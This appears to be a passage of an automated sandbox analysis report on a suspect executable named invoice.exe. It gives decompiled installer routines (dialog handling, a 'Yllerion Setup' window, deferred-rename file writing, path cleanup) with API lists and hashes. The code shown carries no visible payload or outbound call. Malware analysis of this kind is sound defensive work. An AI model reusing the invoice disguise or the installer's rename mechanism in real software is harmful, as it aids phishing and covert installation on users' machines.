                                            											if(_t222 >= _t296) {
                                            												goto L40;
                                            											}
                                            											_t275 = _t275 + 4;
                                            											_t264 = _t263 + _t263;
                                            											_t175 =  *_t275;
                                            											if(_t264 <= _t175) {
                                            												goto L40;
                                            											}
                                            											_t263 = _t264 - _t175;
                                            										}
                                            										goto L40;
                                            									}
                                            									_t168 = _a32 + _t256 * 4;
                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                            									 *_a36 = _t274;
                                            									_t259 = _v16;
                                            									 *_t297 = _t168;
                                            									if(_t259 == 0) {
                                            										 *_a24 = _t168;
                                            									} else {
                                            										_t276 = _v12;
                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                            										_a5 = _a28;
                                            										_a4 = _t222;
                                            										_t262 = _t276 >> _t186;
                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                            										 *(_t298 + _t262 * 4) = _a4;
                                            									}
                                            									_t224 = _v24;
                                            									_t186 = _t224;
                                            									_t225 = _t224 + _a28;
                                            									_v24 = _t225;
                                            								} while (_v8 > _t225);
                                            								L45:
                                            								_t284 = _v36;
                                            								_a5 = _v8 - _t186;
                                            								if(_t284 < 0x42d688 + _a8 * 4) {
                                            									_t205 =  *_t284;
                                            									if(_t205 >= _a12) {
                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                            										_v36 =  &(_v36[1]);
                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                            									} else {
                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                            										_t208 =  *_t284;
                                            										_v36 =  &(_t284[1]);
                                            									}
                                            									_a6 = _t208;
                                            								} else {
                                            									_a4 = 0xc0;
                                            								}
                                            								_t286 = 1 << _v8 - _t186;
                                            								_t244 = _v12 >> _t186;
                                            								while(_t244 < _v40) {
                                            									 *(_t168 + _t244 * 4) = _a4;
                                            									_t244 = _t244 + _t286;
                                            								}
                                            								_t287 = _v12;
                                            								_t246 = 1 << _v44;
                                            								while((_t287 & _t246) != 0) {
                                            									_t287 = _t287 ^ _t246;
                                            									_t246 = _t246 >> 1;
                                            								}
                                            								_t288 = _t287 ^ _t246;
                                            								_v20 = 1;
                                            								_v12 = _t288;
                                            								_t251 = _v16;
                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                            									L60:
                                            									if(_v48 != 0) {
                                            										_t282 = _v48;
                                            										_t283 = _t282 - 1;
                                            										_t200 = _a28 + _t186;
                                            										_v48 = _t283;
                                            										_v24 = _t200;
                                            										if(_v8 <= _t200) {
                                            											goto L45;
                                            										}
                                            										goto L31;
                                            									}
                                            									break;
                                            								} else {
                                            									goto L58;
                                            								}
                                            								do {
                                            									L58:
                                            									_t186 = _t186 - _a28;
                                            									_t251 = _t251 - 1;
                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                            								_v16 = _t251;
                                            								goto L60;
                                            							}
                                            							L61:
                                            							_v8 = _v8 + 1;
                                            							_v32 = _v32 + 4;
                                            							_v44 = _v44 + 1;
                                            						} while (_v8 <= _v28);
                                            						goto L62;
                                            					}
                                            					_t277 = 0;
                                            					do {
                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                            						_t277 = _t277 + 4;
                                            						_t235 = _t235 - 1;
                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                            					} while (_t235 != 0);
                                            					goto L21;
                                            				}
                                            				 *_a24 =  *_a24 & 0x00000000;
                                            				 *_a28 =  *_a28 & 0x00000000;
                                            				return 0;
                                            			}











































































                                            0x00407125
                                            0x0040712c
                                            0x0040712c
                                            0x00407136
                                            0x00407139
                                            0x0040713b
                                            0x00407141
                                            0x00407141
                                            0x0040714a
                                            0x0040714d
                                            0x00407152
                                            0x00407161
                                            0x00407169
                                            0x0040716e
                                            0x00407192
                                            0x0040719a
                                            0x0040719e
                                            0x004071a4
                                            0x00407170
                                            0x0040717e
                                            0x00407181
                                            0x00407187
                                            0x00407187
                                            0x004071a8
                                            0x00407163
                                            0x00407163
                                            0x00407163
                                            0x004071b9
                                            0x004071bd
                                            0x004071c9
                                            0x004071c4
                                            0x004071c7
                                            0x004071c7
                                            0x004071d1
                                            0x004071d6
                                            0x004071de
                                            0x004071da
                                            0x004071dc
                                            0x004071dc
                                            0x004071e4
                                            0x004071e6
                                            0x004071ed
                                            0x004071f7
                                            0x00407201
                                            0x0040721d
                                            0x00407221
                                            0x00407066
                                            0x0040706c
                                            0x0040706d
                                            0x0040706f
                                            0x00407075
                                            0x00407078
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407078
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407203
                                            0x00407203
                                            0x00407203
                                            0x00407208
                                            0x00407211
                                            0x0040721a
                                            0x00000000
                                            0x0040721a
                                            0x00407227
                                            0x00407227
                                            0x0040722a
                                            0x00407231
                                            0x00407234
                                            0x00000000
                                            0x00407057
                                            0x00406fd7
                                            0x00406fd9
                                            0x00406fd9
                                            0x00406fdd
                                            0x00406fe0
                                            0x00406fe1
                                            0x00406fe1
                                            0x00000000
                                            0x00406fd9
                                            0x00406f4d
                                            0x00406f53
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                            • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
                                            • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                            • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0040416F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				struct HWND__* _t52;
                                            				long _t86;
                                            				int _t98;
                                            				struct HWND__* _t99;
                                            				signed int _t100;
                                            				intOrPtr _t103;
                                            				signed int _t106;
                                            				intOrPtr _t107;
                                            				intOrPtr _t109;
                                            				int _t110;
                                            				signed int* _t112;
                                            				signed int _t113;
                                            				char* _t114;
                                            				CHAR* _t115;
                                            
                                            				if(_a8 != 0x110) {
                                            					__eflags = _a8 - 0x111;
                                            					if(_a8 != 0x111) {
                                            						L11:
                                            						__eflags = _a8 - 0x4e;
                                            						if(_a8 != 0x4e) {
                                            							__eflags = _a8 - 0x40b;
                                            							if(_a8 == 0x40b) {
                                            								 *0x42983c =  *0x42983c + 1;
                                            								__eflags =  *0x42983c;
                                            							}
                                            							L25:
                                            							_t110 = _a16;
                                            							L26:
                                            							return E0040408D(_a8, _a12, _t110);
                                            						}
                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                            						_t110 = _a16;
                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                            							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                            								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                            								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                            								_v12 = _t100;
                                            								__eflags = _t100 - _t109 - 0x800;
                                            								_v16 = _t109;
                                            								_v8 = 0x42e3a0;
                                            								if(_t100 - _t109 < 0x800) {
                                            									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                            									SetCursor(LoadCursorA(0, 0x7f02));
                                            									_push("true");
                                            									E00404413(_a4, _v8);
                                            									SetCursor(LoadCursorA(0, 0x7f00));
                                            									_t110 = _a16;
                                            								}
                                            							}
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                            							goto L26;
                                            						} else {
                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                            							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                            								goto L26;
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                            								SendMessageA( *0x42f408, 0x111, "true", 0);
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                            								SendMessageA( *0x42f408, 0x10, 0, 0);
                                            							}
                                            							return 1;
                                            						}
                                            					}
                                            					__eflags = _a12 >> 0x10;
                                            					if(_a12 >> 0x10 != 0) {
                                            						goto L25;
                                            					}
                                            					__eflags =  *0x42983c; // 0x0
                                            					if(__eflags != 0) {
                                            						goto L25;
                                            					}
                                            					_t103 =  *0x42a048; // 0x67d2e4
                                            					_t25 = _t103 + 0x14; // 0x67d2f8
                                            					_t112 = _t25;
                                            					__eflags =  *_t112 & 0x00000020;
                                            					if(( *_t112 & 0x00000020) == 0) {
                                            						goto L25;
                                            					}
                                            					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                            					__eflags = _t106;
                                            					 *_t112 = _t106;
                                            					E00404048(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                            					E004043EF();
                                            					goto L11;
                                            				} else {
                                            					_t98 = _a16;
                                            					_t113 =  *(_t98 + 0x30);
                                            					if(_t113 < 0) {
                                            						_t107 =  *0x42ebdc; // 0x67efe9
                                            						_t113 =  *(_t107 - 4 + _t113 * 4);
                                            					}
                                            					_push( *((intOrPtr*)(_t98 + 0x34)));
                                            					_t114 = _t113 +  *0x42f458;
                                            					_push(0x22);
                                            					_a16 =  *_t114;
                                            					_v12 = _v12 & 0x00000000;
                                            					_t115 = _t114 + 1;
                                            					_v16 = _t115;
                                            					_v8 = E0040413A;
                                            					E00404026(_a4);
                                            					_push( *((intOrPtr*)(_t98 + 0x38)));
                                            					_push(0x23);
                                            					E00404026(_a4);
                                            					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
                                            					E00404048( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                            					_t99 = GetDlgItem(_a4, 0x3e8);
                                            					E0040405B(_t99);
                                            					SendMessageA(_t99, 0x45b, "true", 0);
                                            					_t86 =  *( *0x42f414 + 0x68);
                                            					if(_t86 < 0) {
                                            						_t86 = GetSysColor( ~_t86);
                                            					}
                                            					SendMessageA(_t99, 0x443, 0, _t86);
                                            					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                            					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                            					 *0x42983c = 0;
                                            					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                            					 *0x42983c = 0;
                                            					return 0;
                                            				}
                                            			}





















                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041FA
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040420E
                                            • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040422C
                                            • GetSysColor.USER32(?), ref: 0040423D
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                                            • lstrlenA.KERNEL32(?), ref: 0040425E
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                                            • GetDlgItem.USER32(?,0000040A), ref: 004042E4
                                            • SendMessageA.USER32(00000000), ref: 004042E7
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404312
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00404361
                                            • SetCursor.USER32(00000000), ref: 0040436A
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404380
                                            • SetCursor.USER32(00000000), ref: 00404383
                                            • SendMessageA.USER32(00000111,?,00000000), ref: 004043AF
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: :A@$Call$N$g
                                            • API String ID: 3103080414-1882028536
                                            • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                            • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                                            • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                                            • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                            				struct tagLOGBRUSH _v16;
                                            				struct tagRECT _v32;
                                            				struct tagPAINTSTRUCT _v96;
                                            				struct HDC__* _t70;
                                            				struct HBRUSH__* _t87;
                                            				struct HFONT__* _t94;
                                            				long _t102;
                                            				signed int _t126;
                                            				struct HDC__* _t128;
                                            				intOrPtr _t130;
                                            
                                            				if(_a8 == 0xf) {
                                            					_t130 =  *0x42f414;
                                            					_t70 = BeginPaint(_a4,  &_v96);
                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                            					_a8 = _t70;
                                            					GetClientRect(_a4,  &_v32);
                                            					_t126 = _v32.bottom;
                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                            					while(_v32.top < _t126) {
                                            						_a12 = _t126 - _v32.top;
                                            						asm("cdq");
                                            						asm("cdq");
                                            						asm("cdq");
                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                            						_t87 = CreateBrushIndirect( &_v16);
                                            						_v32.bottom = _v32.bottom + 4;
                                            						_a16 = _t87;
                                            						FillRect(_a8,  &_v32, _t87);
                                            						DeleteObject(_a16);
                                            						_v32.top = _v32.top + 4;
                                            					}
                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                            						_a16 = _t94;
                                            						if(_t94 != 0) {
                                            							_t128 = _a8;
                                            							_v32.left = 0x10;
                                            							_v32.top = 8;
                                            							SetBkMode(_t128, "true");
                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                            							_a8 = SelectObject(_t128, _a16);
                                            							DrawTextA(_t128, "Yllerion Setup", 0xffffffff,  &_v32, 0x820);
                                            							SelectObject(_t128, _a8);
                                            							DeleteObject(_a16);
                                            						}
                                            					}
                                            					EndPaint(_a4,  &_v96);
                                            					return 0;
                                            				}
                                            				_t102 = _a16;
                                            				if(_a8 == 0x46) {
                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;
                                            				}
                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                            			}














                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,Yllerion Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F$Yllerion Setup
                                            • API String ID: 941294808-2001645527
                                            • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                            • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                            • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                            • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405BD4(void* __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				long _t12;
                                            				long _t24;
                                            				char* _t31;
                                            				int _t37;
                                            				void* _t38;
                                            				intOrPtr* _t39;
                                            				long _t42;
                                            				CHAR* _t44;
                                            				void* _t46;
                                            				void* _t48;
                                            				void* _t49;
                                            				void* _t52;
                                            				void* _t53;
                                            
                                            				_t38 = __ecx;
                                            				_t44 =  *(_t52 + 0x14);
                                            				 *0x42c600 = 0x4c554e;
                                            				if(_t44 == 0) {
                                            					L3:
                                            					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);
                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                            						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);
                                            						_t53 = _t52 + 0x10;
                                            						E00405F87(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));
                                            						_t12 = E00405AFE(0x42ca00, 0xc0000000, 4);
                                            						_t48 = _t12;
                                            						 *(_t53 + 0x18) = _t48;
                                            						if(_t48 != 0xffffffff) {
                                            							_t42 = GetFileSize(_t48, 0);
                                            							_t6 = _t37 + 0xa; // 0xa
                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                            							if(_t46 == 0 || E00405B76(_t48, _t46, _t42) == 0) {
                                            								L18:
                                            								return CloseHandle(_t48);
                                            							} else {
                                            								if(E00405A63(_t38, _t46, "[Rename]\r\n") != 0) {
                                            									_t49 = E00405A63(_t38, _t21 + 0xa, 0x40a3b8);
                                            									if(_t49 == 0) {
                                            										_t48 =  *(_t53 + 0x18);
                                            										L16:
                                            										_t24 = _t42;
                                            										L17:
                                            										E00405AB9(_t24 + _t46, 0x42c200, _t37);
                                            										SetFilePointer(_t48, 0, 0, 0);
                                            										E00405BA5(_t48, _t46, _t42 + _t37);
                                            										GlobalFree(_t46);
                                            										goto L18;
                                            									}
                                            									_t39 = _t46 + _t42;
                                            									_t31 = _t39 + _t37;
                                            									while(_t39 > _t49) {
                                            										 *_t31 =  *_t39;
                                            										_t31 = _t31 - 1;
                                            										_t39 = _t39 - 1;
                                            									}
                                            									_t24 = _t49 - _t46 + 1;
                                            									_t48 =  *(_t53 + 0x18);
                                            									goto L17;
                                            								}
                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                            								_t42 = _t42 + 0xa;
                                            								goto L16;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					CloseHandle(E00405AFE(_t44, 0, "true"));
                                            					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);
                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                            						goto L3;
                                            					}
                                            				}
                                            				return _t12;
                                            			}




















                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                                            • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
                                              • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                              • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                            • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
                                            • wsprintfA.USER32 ref: 00405C49
                                            • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                            • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                                            • GlobalFree.KERNEL32(00000000), ref: 00405D32
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                                              • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
                                              • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]
                                            • API String ID: 2171350718-1727408572
                                            • Opcode ID: 363ee5158e29d41a6ab622f5bcc6767fef57e6b00bf8f5aa156339dff7e04b73
                                            • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                                            • Opcode Fuzzy Hash: 363ee5158e29d41a6ab622f5bcc6767fef57e6b00bf8f5aa156339dff7e04b73
                                            • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004061CF(CHAR* _a4) {
                                            				char _t5;
                                            				char _t7;
                                            				char* _t15;
                                            				char* _t16;
                                            				CHAR* _t17;
                                            
                                            				_t17 = _a4;
                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                            					_t17 =  &(_t17[4]);
                                            				}
                                            				if( *_t17 != 0 && E0040596A(_t17) != 0) {
                                            					_t17 =  &(_t17[2]);
                                            				}
                                            				_t5 =  *_t17;
                                            				_t15 = _t17;
                                            				_t16 = _t17;
                                            				if(_t5 != 0) {
                                            					do {
                                            						if(_t5 > 0x1f &&  *((char*)(E00405928("*?|<>/\":", _t5))) == 0) {
                                            							E00405AB9(_t16, _t17, CharNextA(_t17) - _t17);
                                            							_t16 = CharNextA(_t16);
                                            						}
                                            						_t17 = CharNextA(_t17);
                                            						_t5 =  *_t17;
                                            					} while (_t5 != 0);
                                            				}
                                            				 *_t16 =  *_t16 & 0x00000000;
                                            				while(1) {
                                            					_t16 = CharPrevA(_t15, _t16);
                                            					_t7 =  *_t16;
                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                            						break;
                                            					}
                                            					 *_t16 =  *_t16 & 0x00000000;
                                            					if(_t15 < _t16) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				return _t7;
                                            			}









                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
                                            • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\invoice.exe",76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
                                            • CharPrevA.USER32(?,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
                                            Strings
                                            • *?|<>/":, xrefs: 00406217
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004061D0
